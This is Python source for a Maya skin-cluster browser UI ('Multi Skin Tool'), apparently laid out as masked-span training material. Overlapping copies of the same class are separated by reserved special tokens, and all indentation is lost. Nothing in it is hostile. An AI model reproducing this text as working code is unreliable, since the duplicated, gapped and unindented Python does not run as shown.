_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
<|reserved_special_token_0|>
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
__dialog = None
@classmethod
def show_dialog(cls):
if cls.__dialog is None:
cls.__dialog = cls()
else:
cls.__dialog.raise_()
cls.__dialog.show()
def __init__(self, parent=None):
super(MultiSkin_UI, self).__init__(parent=parent)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.setObjectName('multi skin ui')
self.starting_height = 500
self.starting_width = 390
self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))
self.setWindowFlags(QtCore.Qt.Tool)
self.setMinimumWidth(self.starting_width)
self.resize(self.starting_width, self.starting_height)
self.mainBox = QtWidgets.QVBoxLayout()
self.mainBox.setContentsMargins(0, 0, 0, 0)
self.scroll_layout = QtWidgets.QScrollArea()
self.mainBox.addWidget(self.scroll_layout)
self.setLayout(self.mainBox)
self.scroll_layout.setContentsMargins(0, 0, 0, 0)
self.scroll_layout.setWidgetResizable(True)
self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)
self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)
self.scroll_widget = QtWidgets.QWidget()
self.scroll_layout.setWidget(self.scroll_widget)
self.main_layout = QtWidgets.QVBoxLayout()
self.main_layout.setContentsMargins(*([5] * 4))
self.main_layout.setSpacing(2)
self.setLayout(self.main_layout)
self.scroll_widget.setLayout(self.main_layout)
self.widgetsAndLayouts()
self.create_Button()
self.buildMainLayout()
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[
'buttonsOptions'], '', 30]]
self.buttons = {}
for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:
self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)
self.buttons[buttonName].clicked.connect(buttonFunction)
try:
layout.addWidget(self.buttons[buttonName], int(layout_coord
.split(',')[0]), int(layout_coord.split(',')[1]))
except ValueError:
layout.addWidget(self.buttons[buttonName])
_optionsExpandAll = self.buttons['Expand All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsExpandAll['Shapes'].triggered.connect(lambda : self.
expandTree('shape'))
_optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.
expandTree('skin cluster'))
_optionsCloseAll = self.buttons['Close All'].addButtonActions([
'Shapes', 'Skin Clusters'])
_optionsCloseAll['Shapes'].triggered.connect(lambda : self.
closeTree('shape'))
_optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.
closeTree('skin cluster'))
def buildMainLayout(self):
self.main_layout.addLayout(self.hlayout['filterOptions'])
self.hlayout['filterOptions'].addWidget(self.allFilter)
self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)
self.hlayout['filterOptions'].addStretch()
self.main_layout.addLayout(self.hlayout['searchBarWidget'])
self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)
self.main_layout.addLayout(self.hlayout['buttonsOptions'])
self.main_layout.addLayout(self.vlayout['treeWidget'])
def refreshQtree(self):
self.meshTreeWidget.clear()
all_status = self.allFilter.isChecked()
if all_status:
_filter = 'all'
else:
_filter = 'skinClusters'
self.filterList = self.filterMeshes(filter=_filter)
self.populateQTree(self.filterList)
def getSearchBarText(self):
searchBarText = self.searchBar.text()
return searchBarText
def searchBarEdited(self):
matchCase = bool(self.matchCaseChx.checkState())
query = self.searchBar.text()
if matchCase:
query_words = str(query).split(' ')
else:
query_words = str(query).lower().split(' ')
query_words = filter(None, query_words)
scoreList = {}
for item in [str(x) for x in self.filterList]:
score = 0
for query_word in query_words:
if matchCase:
if query_word in item:
score += 1
elif query_word in item.lower():
score += 1
scoreList[item] = score
sorted_matches = [i for i in scoreList.items() if i[1] >= len(
query_words)]
sorted_matches = sorted(sorted_matches, key=lambda x: x[0])
sorted_matches_string = [name for name, index in sorted_matches]
self.meshTreeWidget.clear()
self.populateQTree(sorted_matches_string)
def populateQTree(self, filterList):
self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(
item)]) for item in filterList]
[root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]
[root.setExpanded(True) for root in self.roots]
self.QtShapes = []
shape_dic = self.getAllShapes(self.getAllMeshes())
QTroots_dic = {}
for root in self.roots:
try:
QTroots_dic.update({root: shape_dic[root.text(0)]})
except KeyError:
pass
for QTroot, shapesList in QTroots_dic.items():
[QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in
shapesList]
child_count = QTroot.childCount()
children = [QTroot.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in
children]
[child.setExpanded(True) for child in children]
[self.QtShapes.append(child) for child in children]
self.QTClusters = []
cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))
QTshape_dic = {}
for shape in self.QtShapes:
QTshape_dic.update({shape: cluster_dic[shape.text(0)]})
for QTshape, clusterList in QTshape_dic.items():
if clusterList == 'None':
pass
else:
QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])
child_count = QTshape.childCount()
children = [QTshape.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in
children]
[self.QTClusters.append(child) for child in children]
bindJoints_dic = self.getBindJointsFromCluster([x for x in
cluster_dic.values() if x != 'None'])
QTcluster_dic = {}
for cluster in self.QTClusters:
QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})
for QTCluster, jointList in QTcluster_dic.items():
[QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in
jointList]
child_count = QTCluster.childCount()
children = [QTCluster.child(index) for index in range(child_count)]
[child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for
child in children]
[child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in
children]
def closeTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(False) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(False) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(False) for sclus in self.QTClusters]
def expandTree(self, type='mesh'):
if type == 'mesh':
[root.setExpanded(True) for root in self.roots]
elif type == 'shape':
[shape.setExpanded(True) for shape in self.QtShapes]
elif type == 'skin cluster':
[sclus.setExpanded(True) for sclus in self.QTClusters]
def showSelected(self):
selection = pm.selected()
selection.sort()
self.meshTreeWidget.clear()
self.populateQTree(selection)
def singleClickedAction(self):
mySelection = self.meshTreeWidget.selectedItems()
str_selected = [x.text(0) for x in mySelection]
pm.select(str_selected, r=1)
def filterMeshes(self, filter='all'):
"""
filter:
all : all meshes
skinClusters : all meshes with skinClusters
None
"""
if filter == 'all':
return self.getAllMeshes()
elif filter == 'skinClusters':
clusters = pm.ls(type='skinCluster')
meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for
c in clusters], []))
meshes = set([x.getParent() for x in meshesShapes if pm.
objectType(x) == 'mesh'])
return meshes
elif filter == 'None':
return None
@staticmethod
def test():
print('test')
@staticmethod
def getSkinCluster(_transform):
"""
Find a SkinCluster from a transform
Returns the skinCluster node
"""
result = []
if not pm.objExists(_transform):
return result
validList = mel.eval('findRelatedDeformer("' + str(_transform) + '")')
if validList is None:
return result
for elem in validList:
if pm.nodeType(elem) == 'skinCluster':
result.append(elem)
pm.select(result, r=True)
result_node = pm.selected()
if len(result_node) > 1:
return result_node
else:
try:
return result_node[0]
except IndexError:
return False
@staticmethod
def getBindJointsFromCluster(clusterList):
"""
Find all joints attached to a skinCluster
@param clusterList: List. list of skin Clusters
return dic with key: skin Cluster. Value: list of joint
"""
bindJoints_dic = {}
for cluster in clusterList:
all_binds_jnts = [x for x in pm.listConnections(str(cluster) +
'.matrix[*]', s=1)]
bindJoints_dic.update({str(cluster): all_binds_jnts})
return bindJoints_dic
@staticmethod
def getAllMeshes():
"""
return: list of all meshes / geometry
"""
shapesList = pm.ls(type='mesh', ni=1)
transformList = list(set(pm.listRelatives(shapesList, parent=True)))
transformList.sort()
return transformList
@staticmethod
def getAllShapes(transforms):
"""
@param transforms: List.
return : dictionnary with key:mesh / values: shapes
"""
shapes_dic = {}
for transform in transforms:
all_shapes = pm.PyNode(transform).getShapes(ni=True)
shapes_dic.update({str(transform): all_shapes})
return shapes_dic
def getSkinClusterbyShape(self, shapes):
"""
get skinCluster attached to the shape
@param shapes: List
return: List
"""
cluster_dic = {}
for shape in shapes:
try:
incoming = mc.listConnections('{}.inMesh'.format(shape))[0]
if pm.objectType(incoming) == 'skinCluster':
cluster_dic.update({str(shape): incoming})
else:
skinCluster = self.getSkinCluster(shape)
if skinCluster:
if len(skinCluster) > 1:
cluster_dic.update({str(shape): 'None'})
else:
cluster_dic.update({str(shape): skinCluster})
else:
cluster_dic.update({str(shape): 'None'})
except TypeError:
cluster_dic.update({str(shape): 'None'})
return cluster_dic
def showUI(dialog=False):
if dialog:
MultiSkin_UI.show_dialog()
else:
global tools_cw_ui
try:
tools_cw_ui.deleteLater()
except:
pass
tools_cw_ui = MultiSkin_UI()
tools_cw_ui.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def undo(func):
"""
Puts the wrapped `func` into a single Maya Undo action, then
undoes it when the function enters the finally: block
from schworer Github
"""
@wraps(func)
def _undofunc(*args, **kwargs):
try:
mc.undoInfo(ock=True)
return func(*args, **kwargs)
finally:
mc.undoInfo(cck=True)
return _undofunc
<|reserved_special_token_0|>
class MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):
__dialog = None
@classmethod
def show_dialog(cls):
if cls.__dialog is None:
cls.__dialog = cls()
else:
cls.__dialog.raise_()
cls.__dialog.show()
def __init__(self, parent=None):
super(MultiSkin_UI, self).__init__(parent=parent)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.setObjectName('multi skin ui')
self.starting_height = 500
self.starting_width = 390
self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))
self.setWindowFlags(QtCore.Qt.Tool)
self.setMinimumWidth(self.starting_width)
self.resize(self.starting_width, self.starting_height)
self.mainBox = QtWidgets.QVBoxLayout()
self.mainBox.setContentsMargins(0, 0, 0, 0)
self.scroll_layout = QtWidgets.QScrollArea()
self.mainBox.addWidget(self.scroll_layout)
self.setLayout(self.mainBox)
self.scroll_layout.setContentsMargins(0, 0, 0, 0)
self.scroll_layout.setWidgetResizable(True)
self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)
self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)
self.scroll_widget = QtWidgets.QWidget()
self.scroll_layout.setWidget(self.scroll_widget)
self.main_layout = QtWidgets.QVBoxLayout()
self.main_layout.setContentsMargins(*([5] * 4))
self.main_layout.setSpacing(2)
self.setLayout(self.main_layout)
self.scroll_widget.setLayout(self.main_layout)
self.widgetsAndLayouts()
self.create_Button()
self.buildMainLayout()
def widgetsAndLayouts(self):
def addLine():
line = QtWidgets.QFrame()
line.setFrameShape(QtWidgets.QFrame.HLine)
return line
def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,
bold=False):
myFont = QtGui.QFont()
myFont.setBold(bold)
text = QtWidgets.QLabel(message)
text.setAlignment(alignement)
text.setFixedHeight(height)
text.setFont(myFont)
return text
self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]
self.vlayout = {}
for layoutName, margins in self.vLayoutAndFunctions:
self.vlayout[layoutName] = QtWidgets.QVBoxLayout()
self.vlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [
'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]
self.hlayout = {}
for layoutName, margins in self.hLayoutAndFunctions:
self.hlayout[layoutName] = QtWidgets.QHBoxLayout()
self.hlayout[layoutName].setContentsMargins(margins[0], margins
[1], margins[2], margins[3])
self.searchBar = QtWidgets.QLineEdit()
self.searchBar.setPlaceholderText('Search...')
self.searchBar.textEdited.connect(self.searchBarEdited)
self.hlayout['searchBarWidget'].addWidget(self.searchBar)
self.matchCaseChx = QtWidgets.QCheckBox()
self.matchCaseChx.setChecked(False)
self.matchCaseChx.setText('Match Case')
self.matchCaseChx.stateChanged.connect(self.searchBarEdited)
self.allFilter = QtWidgets.QRadioButton('All', self)
self.allFilter.setChecked(True)
self.allFilter.toggled.connect(self.refreshQtree)
self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)
self.skinClusterFilter.setChecked(True)
self.skinClusterFilter.toggled.connect(self.refreshQtree)
self.meshTreeWidget = QtWidgets.QTreeWidget()
self.meshTreeWidget.setHeaderLabel('Cloth Tree View')
self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.
ExtendedSelection)
self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)
header = QtWidgets.QTreeWidgetItem(['Geometries'])
self.meshTreeWidget.setHeaderItem(header)
self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)
self.meshTreeWidget.itemSelectionChanged.connect(self.
singleClickedAction)
self.refreshQtree()
def create_Button(self):
""" Create the buttons """
self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,
pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],
'', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Clear', self.meshTreeWidget.clear, 0, pyQtDic[
'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],
['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],
'', self.hlayout['buttonsOptions'], '', 30], ['Close All', self
